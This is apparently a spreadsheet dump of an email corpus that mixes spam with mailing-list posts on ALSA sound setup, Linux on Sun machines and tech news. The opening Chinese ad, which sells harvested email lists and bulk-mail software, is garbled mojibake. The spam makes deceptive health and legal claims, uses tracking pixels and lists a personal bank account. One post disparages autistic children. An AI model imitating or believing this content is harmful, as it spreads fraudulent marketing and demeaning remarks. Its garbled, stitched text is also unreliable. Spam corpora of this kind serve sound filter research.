 &lt;BR&gt;
 &amp;nbsp; &amp;nbsp;̘IвșC᣿
 һΓЎ׃|̘I͑᣿&lt;BR&gt;
 &amp;nbsp; &amp;nbsp;ԽԽ{ W·ֱNɠδINʽE-mailǾWϠINҲõĹߡ&lt;BR&gt;
 cVrЧߣr͡eMarketerӋ61%еҎģ˾\]MРINӡ&lt;BR&gt;
 &lt;BR&gt;
 ֏Výwƽؑʱ^ Average Response
 Rate Ranges &lt;BR&gt;
  0.5-1% ͨ(banner ads) &lt;BR&gt;
 &lt;BR&gt;
  1-2% ͨż(direct mail) &lt;BR&gt;
 &lt;BR&gt;
  10-15% ](Email) &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;&lt;FONT size="+1" color="#ff0080"&gt;һ []] &lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 ُIȫ]ַ ÿ1000f/500HK ُIȫ9000f/3600HK
 &lt;BR&gt;
 ُI]ַ ÿ10f/400HK &amp;nbsp; ُIȫ325f/5500HK
 &amp;nbsp;&lt;A href="http://www.jjyx.com/serve/hk1.txt" target="_blank" style="font-size : 21px;"&gt;&lt;B&gt;&lt;FONT size="+1" color="#ff0000"&gt;free download&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
 ُI_]ַ ÿ10f/400HK &amp;nbsp; ُI_ȫ201f/4500HK
 &amp;nbsp;&lt;A href="http://www.jjyx.com/serve/wd/taiwan.txt" target="_blank" style="font-size : 21px;"&gt;&lt;B&gt;&lt;FONT size="+1" color="#ff0000"&gt;free download&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;&lt;FONT size="+1" color="#ff0080" style="color : #0080ff;"&gt; &amp;nbsp; &amp;nbsp;[]l]&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 V]lͣ ÿ10f/500HK 20fl
 ʴ_90%ϣ&lt;BR&gt;
 Ⱥl &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; һ60f/2500HK
 &lt;BR&gt;
 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;һ100f/4000HK
 CWվL2000ϣ&lt;BR&gt;
 Ⱥl &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; һ500f/9500HK
 CWվL5000ϣ &lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;&lt;FONT size="+1" color="#ff8040" style="color : #ff8040;"&gt; &amp;nbsp; &amp;nbsp;[]ܛw]&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;SPAN lang="EN-US" style="FONT-SIZE: 9pt; COLOR: #0000c4"&gt;&lt;SPAN style="COLOR: navy; mso-fareast-font-family: PMingLiU; mso-fareast-language: ZH-TW"&gt;70&lt;/SPAN&gt;&lt;SPAN lang="ZH-TW" style="COLOR: navy; FONT-FAMILY: PMingLiU; mso-fareast-language: ZH-TW; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'"&gt;NȺlW·lܛw&lt;/SPAN&gt;&lt;SPAN style="COLOR: navy; mso-fareast-font-family: PMingLiU; mso-fareast-language: ZH-TW"&gt;/2200&lt;/SPAN&gt;&lt;SPAN lang="ZH-TW" style="COLOR: navy; FONT-FAMILY: PMingLiU; mso-fareast-language: ZH-TW; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'"&gt;HK&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN lang="EN-US" style="FONT-SIZE: 9pt; mso-fareast-font-family: PMingLiU; mso-fareast-language: ZH-TW"&gt; &lt;/SPAN&gt;&lt;SPAN lang="ZH-TW" style="FONT-SIZE: 9pt; FONT-FAMILY: PMingLiU; mso-fareast-language: ZH-TW; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'"&gt;&lt;/SPAN&gt;&lt;SPAN lang="ZH-TW" style="FONT-SIZE: 9pt"&gt;&lt;/SPAN&gt;&lt;SPAN lang="EN-US" style="FONT-SIZE: 9pt"&gt;&lt;/SPAN&gt;&lt;SPAN lang="EN-US" style="FONT-SIZE: 9pt; COLOR: #0000bf"&gt;&lt;SPAN lang="ZH-TW" style="COLOR: navy; FONT-FAMILY: PMingLiU; mso-fareast-language: ZH-TW; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'"&gt;&lt;/SPAN&gt;&lt;SPAN style="COLOR: navy; mso-fareast-font-family: PMingLiU; mso-fareast-language: ZH-TW"&gt;&lt;/SPAN&gt;&lt;SPAN lang="ZH-TW" style="COLOR: navy; FONT-FAMILY: PMingLiU; mso-fareast-language: ZH-TW; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'"&gt;׌ԼһƵ]ȺlW·lϵy&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;BR&gt;
 ϵ&lt;A href="mailto:yhzx599@vip.sina.com"&gt;yhzx599@vip.sina.com&lt;/A&gt;&lt;/P&gt;
 &lt;P&gt;&lt;BR&gt;
 &lt;B&gt;&lt;FONT size="+1" color="#ff0000"&gt; ]Ե ֵգػ݃r2200
 HK&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 y֮ǎȫ6000Ӣ棬M200档׌ľWվuȫ&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;e-mailַڸ؅^ķցє&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 ۡ32525642
 &amp;nbsp;&lt;A href="http://www.jjyx.com/serve/hk1.txt" target="_blank" style="font-size : 21px;"&gt;&lt;B&gt;&lt;FONT size="+1" color="#ff0000"&gt;free download the sample&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
 _20012356
 &amp;nbsp;&lt;A href="http://www.jjyx.com/serve/wd/taiwan.txt" target="_blank" style="font-size : 21px;"&gt;&lt;B&gt;&lt;FONT size="+1" color="#ff0000"&gt;free download the sample&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
 ȫ򡪡9000f&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &amp;nbsp; y֮ǓЇσ|ЧemailλַYώ죬Ը͑Ҫָĵط^,ИIeȌͶ]V档&lt;BR&gt;
 磺׌ĳ10fһ֮֪ĮaƷYӍV]ͶžõĽQărЂúrͣ&lt;BR&gt;
 ЧġCÿrÿ̶ȴ㣬ҲS@ӵĂúֶΣеĸ֡sЄӰɣ׌I&lt;BR&gt;
 ˾̘Iý}------Ve-mail@ͨNIܱȔMġ&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT size="+1"&gt;&lt;B&gt;_x0093_Mʽ&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 ˾¾W·V꣬λЇĴW·V֮һ&lt;BR&gt;
 ҂ЌTļgˆT͸ٌIķϵy´헹،IṩѸݡЧMķա&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT size="+1"&gt;&lt;B&gt;͑Ոc@Y_x0093_M])&lt;BR&gt;
 &lt;A href="mailto:yhzx599@vip.sina.com"&gt;yhzx599@vip.sina.com&lt;/A&gt; ՈעҪķc_x0093_Mʽ҂؏&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;&lt;FONT size="+1"&gt;ۡġ_؅^ʽκ·Ҿɵy늅R2-3쵽&lt;BR&gt;
 赽yk늅R &lt;BR&gt;
 English:&lt;BR&gt;
 &lt;BR&gt;
 BENIFICIARY CUSTOMER: &amp;nbsp;wangjingjing&lt;BR&gt;
 A/C BANK: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
 &amp;nbsp; &amp;nbsp;BANK OF CHINA MIANYANG BRANCH&lt;BR&gt;
 A/C NO: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
 &amp;nbsp; &amp;nbsp; &amp;nbsp;8209 9802 0003 158&lt;BR&gt;
 BENIFICIARY'S TEL NO : 0816-6623109&lt;BR&gt;
 &lt;BR&gt;
 Čգ&lt;BR&gt;
   ˣ &lt;BR&gt;
 տyУ Їyоdꖷ&lt;BR&gt;
  &amp;nbsp; &amp;nbsp;̖ 8209 9802 0003 158&lt;BR&gt;
 տԒ0816-6623109&lt;BR&gt;
 &lt;BR&gt;
 2-3쵽҂ṩMա&lt;BR&gt;
 &lt;BR&gt;
 gӭŁJԃ_x0093_M Ԓ0086-0816-6623109
 &lt;/FONT&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT size="+1"&gt;y֮ǾW·YӍ޹˾&lt;BR&gt;
 ˾ַЇꑾd&lt;BR&gt;
 EMAIL&lt;A href="mailto:yhzx599@vip.sina.com"&gt;yhzx599@vip.sina.com&lt;/A&gt; &lt;BR&gt;
 JԃԒ0086-0816-6623109 &lt;/FONT&gt;&lt;BR&gt;
 &lt;BR&gt;
 -----------------------------------------------------------------------------------------------------------------------------------&lt;BR&gt;
 ˾ՌW·ƏV WվO W·
 W퓼Ĵ ׃Qg ܛwlչȣrXՃ|gӭŁ_x0093_M&lt;BR&gt;
 -----------------------------------------------------------------------------------------------------------------------------------&lt;/B&gt;&lt;/P&gt;
 &lt;/BODY&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: da bomb
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63309
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63309
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: thanks for the gamix source rpms! [ALSA stuff]
</t>
  </si>
  <si>
    <t xml:space="preserve">I wish I could answer your question but my laptop does not have the digital stuff
 hooked up :( so I so not know about it. I have an excellent ESS Maestro3 which OSS
 supports pretty lame so I was forced to learn about ALSA.
 I have used these commands to explore ALSA and my chip:
 arecord -l   (list devices)
 arecord -L   (list PCM decices)
 I get some output like this:
 &gt; arecord -l
 card 0: MAESTRO3 [ESS Allegro PCI], device 0: Allegro [Allegro]
   Subdevices: 1/1
   Subdevice #0: subdevice #0
 &gt; arecord -L
 PCM list:
  (SNIP - craploads of output)
 I noticed that the output from this commands kind of maps to what the alsamixer or
 gamix have.
 For what it is worth, here is what I have in modules.conf for my sound stuff:
 &gt; ## ALSA portion
 &gt; alias char-major-116 snd
 &gt; ## OSS/Free portion
 &gt; alias char-major-14 soundcore
 &gt;
 &gt; ## ALSA portion
 &gt; alias snd-card-0 snd-maestro3
 &gt; ## OSS/Free portion
 &gt; alias sound-slot-0 snd-card-0
 &gt;
 &gt; ## OSS/Free portion - card #1
 &gt; alias sound-service-0-0 snd-mixer-oss
 &gt; # BAD alias sound-service-0-1 snd-seq-oss
 &gt; alias sound-service-0-3 snd-pcm-oss
 &gt; # BAD alias sound-service-0-8 snd-seq-oss
 &gt; alias sound-service-0-12 snd-pcm-oss
 &gt; #
 &gt; ## ALSA Options (optional)
 &gt; options snd snd_major=116 snd_cards_limit=1 snd_device_mode=0666
 &gt; options snd-maestro3 snd_index=0 snd_id=MAESTRO3 snd_amp_gpio=8
 &gt; #
 &gt; ## OSS Options (optional)
 &gt; alias snd-card-1 off
 &gt; alias snd-card-2 off
 &gt; alias snd-card-3 off
 &gt; alias sound-slot-1 off
 &gt; alias sound-service-1-0 off
 &gt;
 &gt; ## Preserve Mixer Settings
 &gt; #post-install /usr/sbin/alsactl restore MAESTRO3
 &gt; #pre-remove /usr/sbin/alsactl store MAESTRO3
 &gt; post-install /usr/sbin/alsactl restore
 &gt; pre-remove /usr/sbin/alsactl store
 Hope that helps, good luck.
 Lance (lance_tt@bellsouth.net) wrote*:
 &gt;
 &gt;Hello,
 &gt;
 &gt;Thanks for these rpms, I removed the binary built from source (.tar.gz)
 &gt;and installed your SRPM of gamix.  One quick question, is there a way to
 &gt;switch between digital out and analog out with the ALSA driver and
 &gt;utilities, or, for that matter, with gamix?  I know with the OSS drivers
 &gt;I was using it was as simple as 'emu-config -d for digital and
 &gt;emu-config -a for analog, with the emu-tools package for SBLive!  I
 &gt;noticed there is SB Live Analog/Digital Output Jack in alsamixer but
 &gt;haven't figured out the key to use, if this is the right control in
 &gt;mixer.  Also, I tried to expand gamix to display all possible controls
 &gt;but it defaults back to 'Wave' and 'Music'  With LFE, Center, Surround
 &gt;and Playback under Wave (this is how I control output of front and rear
 &gt;speakers for digital out...'Surround' and 'Playback')  Under 'Music'
 &gt;there are two controls but unresponsive.  I have a tuner and cassette
 &gt;deck hooked up to an audio/video switch that goes into 'Line In' on the
 &gt;soundcard.  Again, with the OSS drivers, it was as simple as emu-config
 &gt;-d and emu-config -a.  Digital out for anything coming from the
 &gt;computer, analog out for the tuner and cassette deck.  I don't know if
 &gt;this is necessary to switch inbetween to get 'Line In' to work or not,
 &gt;but an expansion of gamix would help, where I could see all the
 &gt;controls....
 &gt;
 &gt;Any help would be greatly appreciated and thanks again for the gamix
 &gt;rpms.
 &gt;
 &gt;Kind Regards,
 &gt;
 &gt;Lance
 &gt;--
 &gt;:
 &gt;####[ Linux One Stanza Tip (LOST) ]###########################
 &gt;
 &gt;Sub : Command line shortcuts (clear)                 LOST #310
 &gt;
 &gt;Tired of typing in "clear" every time you want the screen to
 &gt;be cleared ? Press [Ctrl-L] ... This works for  most shells,
 &gt;(except for ash, bsh and ksh)
 &gt;
 &gt;####&lt;rtorvi@vsnl.net&gt;#########################################
 &gt;:
 &gt;
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Illusionist emerges after 24 hours underwater
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; An illusionist has emerged after 24 hours underwater in a case in New York's
 &gt; Times Square.
 I'd just like to recommend the newest Viz to ukers just for the hilarious "David 
 Blaine: Stalag Magician".  The ego'd one is in a WWII prison camp and sort of 
 trying to escape.  Several times he seems to have escaped and the british 
 officers celebrate before it's revealed he's been buried alive or hiding in a 
 freezer.  At one point he's asked why and says "Well it's not for publicity" 
 Cracking stuff.
 Stew
 -- 
 Stewart Smith
 Scottish Microelectronics Centre, University of Edinburgh.
 http://www.ee.ed.ac.uk/~sxs/
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cloud of anti-atoms created
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8015195,1440/
 Date: Not supplied
 Researchers say they have made at least 50,000 atoms of cold antihydrogen - 
 analysing them may reveal why antimatter is so rare
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Penile enlargement method - guaranteed !
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B2_83B03D1E.C6530E24
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+PGJvZHk+PGRpdiBpZD0ibWVzc2FnZUJvZHkiPjxkaXY+PGZvbnQg
 ZmFjZT0iQXJpYWwiIHNpemU9IjIiPlRoaXMgbWVzc2FnZSBpcyBzZW50IHRv
 IG91ciBzdWJzY3JpYmVycyBvbmx5LiBGdXJ0aGVyIGVtYWlscyB0byB5b3Ug
 YnkgdGhlIHNlbmRlciB0aGlzIG9uZSB3aWxsIGJlIHN1c3BlbmRlZCBhdCBu
 byBjb3N0IHRvIHlvdS4gU2NyZWVuaW5nIG9mIGFkZHJlc3NlcyBoYXMgYmVl
 biBkb25lIHRvIHRoZSBiZXN0IG9mIG91ciBhYmlsaXR5LCB1bmZvcnR1bmF0
 ZWx5IGl0IGlzIGltcG9zc2libGUgdG8gYmUgMTAwJSBhY2N1cmF0ZSwgc28g
 aWYgeW91IGRpZCBub3QgYXNrIGZvciB0aGlzLCBvciB3aXNoIHRvIGJlIGV4
 Y2x1ZGVkIG9mIHRoaXMgbGlzdCwgcGxlYXNlIGNsaWNrIDxhIGhyZWY9Im1h
 aWx0bzpoZWFsdGgxMDVAbWFpbC5ydT9zdWJqZWN0PXJlbW92ZSIgdGFyZ2V0
 PSJuZXdfd2luIj5oZXJlPC9hPjwvZm9udD48L2Rpdj4gIDxwPjxiPjxmb250
 IGZhY2U9IkFyaWFsIj48Zm9udCBjb2xvcj0iI2ZmMDAwMCI+VEhJUyBJUyBG
 T1IgQURVTFQgTUVOIE9OTFkgISBJRiBZT1UgQVJFIE5PVCBBTiBBRFVMVCwg
 REVMRVRFIE5PVyAhDQo8cD4NCjxwIGFsaWduPSJjZW50ZXIiPjxpbWcgc3Jj
 PSJodHRwOi8vYTIyMDAudHJpcG9kLmNvbS5jby9waG90by5qcGciIHdpZHRo
 PSIzNTEiIGhlaWdodD0iMTc5Ij48L3A+DQo8L2ZvbnQ+PC9wPjxkaXY+V2Ug
 YXJlIGEgc2VyaW91cyBjb21wYW55LCBvZmZlcmluZyBhIHByb2dyYW0gdGhh
 dCB3aWxsIGVuaGFuY2UgeW91ciBzZXggbGlmZSwgYW5kIGVubGFyZ2UgeW91
 ciBwZW5pcyBpbiBhIHRvdGFsbHkgbmF0dXJhbCB3YXkuIDxwPldlIHJlYWxp
 emUgbWFueSBtZW4gLWFuZCB0aGVpciBwYXJ0bmVycy0gYXJlIHVuaGFwcHkg
 d2l0aCB0aGVpciBwZW5pcyBzaXplLiBUaGUgdHJ1dGggaXMgdGhhdCBzaXpl
 IG1hdHRlcnM7IG5vdCBvbmx5IGl0IGFmZmVjdHMgbWFueSBtZW4ncyBwZXJm
 b3JtYW5jZSwgYnV0IHRoZWlyIHNlbGYtZXN0ZWVtIGFzIHdlbGwuPC9wPjxw
 PiZuYnNwOzwvZGl2PjxkaXY+UGVuaXMgZW5sYXJnZW1lbnQgSVMgUE9TU0lC
 TEU7IGp1c3QgYXMgeW91IGNhbiBleGVyY2lzZSBhbG1vc3QgYW55IHBhcnQg
 b2YgDQp5b3VyIGJvZHksIHlvdSBDQU4gZXhlcmNpc2UgeW91ciBwZW5pcy48
 L3A+DQo8L2ZvbnQ+PC9kaXY+PGZvbnQgY29sb3I9IiNmZjAwMDAiPjxkaXY+
 PGZvbnQgZmFjZT0iQXJpYWwiIGNvbG9yPSIjZmYwMDAwIiBzaXplPSIzIj5P
 dXIgcHJvZ3JhbSBpcyB0b3RhbGx5IFBST1ZFTiBhbmQgMTAwJSBHVUFSQU5U
 RUVEICE8L3A+DQo8L2Rpdj48ZGl2Pk91ciBjb21wYW55IGhhcyB0aGUgdGVj
 aG5pcXVlcyEgVG90YWxseSBOQVRVUkFMIHRlY2huaXF1ZXM7IG5vIGdhZGdl
 dHMsIG5vIHB1bXBzLCBubyBzdXJnZXJ5ICE8L2Rpdj48cD5JZiB5b3Ugd2Fu
 dCBtb3JlIGluZm9ybWF0aW9uLCBwbGVhc2UgY2xpY2sgPGEgaHJlZj0iaHR0
 cDovL2xhcmdlMS50cmlwb2QuY29tLmFyIj5oZXJlPC9hPiwgb3Igc2VuZCB1
 cyBhbiBlbWFpbCA8YSBocmVmPSJtYWlsdG86aW5mbzMwMTdAZXhjaXRlLmNv
 bSAgICAgICAgP3N1YmplY3Q9bW9yZWluZm8iPmhlcmU8L2E+PC9wPg0KPC9k
 aXY+PGRpdj5UaGlzIElTIE5PVCBVTlNPTElDSVRFRDsgeW91IGFwcGVhciBp
 biBhbiBzdWJzY3JpcHRpb24gbGlzdCwgaWYgaW4gZXJyb3IsIHBsZWFzZSBs
 ZXQgdXMga25vdy4gUGxlYXNlIGxldCB0aG9zZSB3aG8gc3VmZmVyIGZyb20g
 ZXJlY3RpbGUgZHlzZnVuY3Rpb24sIHNtYWxsIHBlbmlzIHNpemUsIGFuZCBv
 dGhlciBtYWxlIGFpbG1lbnRzIHJlYWQgdGhpcyBtZXNzYWdlITwvZGl2Pjxw
 PkRJU1BPTklCTEUgVEFNQklFTiBFTiBFU1BBTk9MPGZvbnQgY29sb3I9IiNm
 ZmZmZmYiPjAyMjBqbkhwOS00NzhSTFJkNzczOFNZbVQyLTEzNXd6Z3IyNjc3
 UlFKbTQtMTU3cWFFRjk3NzRER2FsNTU=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Repair Your Credit, LEGALLY and for FREE
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Reduce Your Debt in 3 minutes&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;body BGCOLOR="#FFFFFF"&gt;
 &lt;img src="http://track.optinllc.com/tev.asp?eid=20167" height="1" width="1"&gt;
 &lt;CENTER&gt;
 &lt;TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0"&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN="2"&gt;
 			&lt;a 
 href="http://track.optinllc.com/clicktrack.asp?eid=20167&amp;url=http%3A%2F%2Fwww.directdebtconsolidation.com%2Fapp1.cfm%3Fcoid%3D2563"&gt;&lt;IMG 
 SRC="http://64.251.20.8/20167/index_01.gif" WIDTH="525" HEIGHT="34" 
 BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;a 
 href="http://track.optinllc.com/clicktrack.asp?eid=20167&amp;url=http%3A%2F%2Fwww.directdebtconsolidation.com%2Fapp1.cfm%3Fcoid%3D2563"&gt;&lt;IMG 
 SRC="http://64.251.20.8/20167/index_02.jpg" WIDTH="212" HEIGHT="231" 
 BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;a 
 href="http://track.optinllc.com/clicktrack.asp?eid=20167&amp;url=http%3A%2F%2Fwww.directdebtconsolidation.com%2Fapp1.cfm%3Fcoid%3D2563"&gt;&lt;IMG 
 SRC="http://64.251.20.8/20167/index_03.gif" WIDTH="313" HEIGHT="231" 
 BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;&lt;HR WIDTH="500"&gt;&lt;BR&gt;
 &lt;TABLE WIDTH="400" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
    &lt;TR&gt;
      &lt;TD WIDTH="100%"&gt;
        &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;You are receiving this email
        as a subscriber to the DealsUWant mailing list.  To remove yourself
        from this and related email lists click here:&lt;BR&gt;
        &lt;a href="http://remove.optinllc.com"&gt;UNSUBSCRIBE MY 
 EMAIL&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
        &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;&lt;BR&gt;
        Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
        301, Paragraph(a)(2)of S. 1618, a letter cannot be consideyellow
        Spam if the &lt;BR&gt;sender includes contact information and a method
        of &amp;quot;removal&amp;quot;.&lt;/FONT&gt;
        &lt;BR&gt;
        &lt;BR&gt;
      &lt;/TD&gt;
    &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 BAD MSG:
  &gt; And you get a working version of your favourite KDE/Gnome desktop
 &gt; &gt; instead of DTE, uhm, I mean CDE.
 &gt;
 &gt; um.. http://wwws.sun.com/software/star/gnome/ integrated into solaris.
 Yeah yeah yeah. I tried it (over a year ago) and it sucked like a new vacuum
 cleaner. Although I expect that it will be a lot better by now. What I would
 really like to see is Gnome on one of the Sun Ray thin terminals.
 &gt; Out of curiosity, does `normal fashion` mean that you still have to do the
 &gt; interactive customisations or is it like Solaris jumpstart where you can
 &gt; specify everything on the install server, do `boot net - install` go home,
 and
 &gt; come in to a fully installed and patched desktop the next morning?
 Er, I mean normal fashion for a Linux install. This would be distro
 specific, anyway.
 I am sure it would be possible to do an automated install with a few script
 changes. I would not be surprised if Debian does this already.
 I do know that if you pass extra parameters on the boot command, they are
 picked up by silo. So:
   boot disk linux
 would not prompt for selection but would boot straight through. From there
 it is a matter of tftp'ing the correct config file and the install would be
 automatic from there on.
 &gt; I don't see why this should be a _major problem. The prom (ie the "ok"
 &gt; prompt)
 &gt; is almost at the hardware level and hence dosent depend on the os so you
 &gt; should be able to connect to that easily enough. Once the machine is
 installed
 &gt; cant you just log in over the network? The network is the computer after
 all
 &gt; (sorry couldn't resist!)
 The problem is that the time between linux booting and when the console tty
 drivers are started can be a black hole, without error messages or log in
 prompts. The other problem is that sometimes Linux will drop in to the PROM
 on shutdown instead of powering off or rebooting. Without a serial cable or
 keyboard it is not possible to reboot the box without flicking the power
 switch hidden at the back of the case.
 I think if the console is ttya/ttyS0 it will drop into PROM. If it is
 /dev/null then you do not get console messages but the box will shut down
 properly.
 - Matthew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</si>
  <si>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Subject: A marketplace where lenders compete for your business LFHLXHU
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;/HEAD&gt;&lt;BODY&gt;&lt;CENTER&gt;
 &lt;A href=3D"http://61.145.116.186/user0201/index.asp?Afft=3DQM10"&gt; 
 &lt;IMG src=3D"http://61.129.68.14/mortad2.gif" border=3D0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D1&gt;
 Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer like us=
 to contact you or feel that you have&lt;BR&gt;received this email in error, 
 please &lt;A href=3D"http://61.145.116.186/light/watch.asp"&gt;click here 
 to unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NASA mindreading
</t>
  </si>
  <si>
    <t xml:space="preserve">NASA Plans to Read Terrorist's Minds at Airports
 http://www.washtimes.com/national/20020817-704732.htm
 This just strikes me as being so ridiculously bizarre. We are truly 
 beginning to blur reality with science fiction. Makes me think of  Minority 
 Report (although PKD realized this future decades ago). Especially 
 concerning (or intriguing?) is the revelation that "the agency is 
 developing brain-monitoring devices in cooperation with a commercial firm, 
 which it did not identify".
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: POLICY CHANGE: subscriber-only posting
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 19 Aug 2002, Rohit Khare wrote:
 &gt; Sorry, gang, but I've flipped the switch. If your posting address
 &gt; doesn't match your subscription address, or if you've instructed a robot
 &gt; to forkpost on your behalf, it'll get held, silently, for me or Kragen
 &gt; to review. Which will be rarely, so be warned.
 &gt;
 &gt; Let's see how this works out for a week or so...
 And I didnt even need to visit, woohoo :)
 ... Proving that the threat of my presence gets action in only 14 hours. I
 think I should be offended, but I'll be too busy basking in the glow of a
 spam-free FoRK :)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tech's Major Decline
</t>
  </si>
  <si>
    <t xml:space="preserve">"Once we thought of the Internet as this thing with infinite capabilities.
 It was basically just a fad that came along."
 Missing from the article is the percentage of foreign enrolement, I would
 bet the numbers of students from Asia (China specificly) has gone up quite a
 bit, and is the only thing keeping the overall numbers from plummiting.
 "you can't get the chicks with that anymore."
 About time us geeks were outcasts again. I was getting sick of hearing about
 geeks breeding and ending up with autistic children - proving that
 intelligence is a genetic defect and a "do not breed" flag.)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 -----------------
 Tech's Major Decline
 College Students Turning Away From Bits and Bytes
 By Ellen McCarthy
 Washington Post Staff Writer
 Tuesday, August 27, 2002; Page E01
 If John Yandziak had been entering college a few years ago, he might have
 sought a stake in the "new" economy. He might have dreamed of becoming an
 ace code-cracker for the CIA or the National Security Agency, or imagined
 toppling an empire with revolutionary software. Maybe he would have tried to
 use the Internet to end world hunger.
 But as Yandziak attends his first college classes this week, he's harboring
 different academic ambitions. The Ashburn native says he wants to do
 something more social and more interesting than working with computers.
 Besides, he said while packing for a Charlottesville dormitory room, "you
 can't get the chicks with that anymore."
 The tech industry's financial problems are enough to bankrupt the dreams of
 some fair-weather students. But now there's another consequence of the tech
 bust: Enrollment growth in undergraduate computer science departments has
 come to a halt.
 The number of undergraduates majoring in computer science fell 1 percent in
 2001, according to a report by the Computing Research Association. And
 educators in the field say the trend seems to be accelerating, with some
 colleges seeing much greater drops as the new academic year begins.
 The word is out among department deans that the bust's fallout has trickled
 into the classroom, said Maria Clavez, president of the Association of
